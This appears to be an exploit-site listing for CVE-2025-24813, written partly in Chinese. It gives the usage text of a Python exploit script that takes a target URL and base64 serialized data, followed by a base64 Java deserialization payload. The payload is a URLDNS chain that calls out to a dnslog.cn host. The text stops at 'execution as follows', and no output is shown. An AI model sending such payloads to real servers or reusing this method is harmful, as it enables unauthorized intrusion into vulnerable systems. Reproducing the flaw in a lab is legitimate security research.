Share
## https://sploitus.com/exploit?id=4B309332-736C-5888-B9E1-829B5787E9D7
# CVE-2025-24813
简单复现分析了CVE-2025-24813,并且写了一个简单的利用脚本
```
usage: CVE-2025-24813.py [-h] -u URL [-d DATA]
CVE-2025-24813
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL URL
-d DATA, --data DATA base64_serial_data
```
示例
使用vulhub启动一个存在漏洞的服务,用urldns链子生成一个payload
```
rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAEDV6cXZxMy5kbnNsb2cuY250AABxAH4ABXQABGh0dHBweHNyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABeA==
```
执行如下

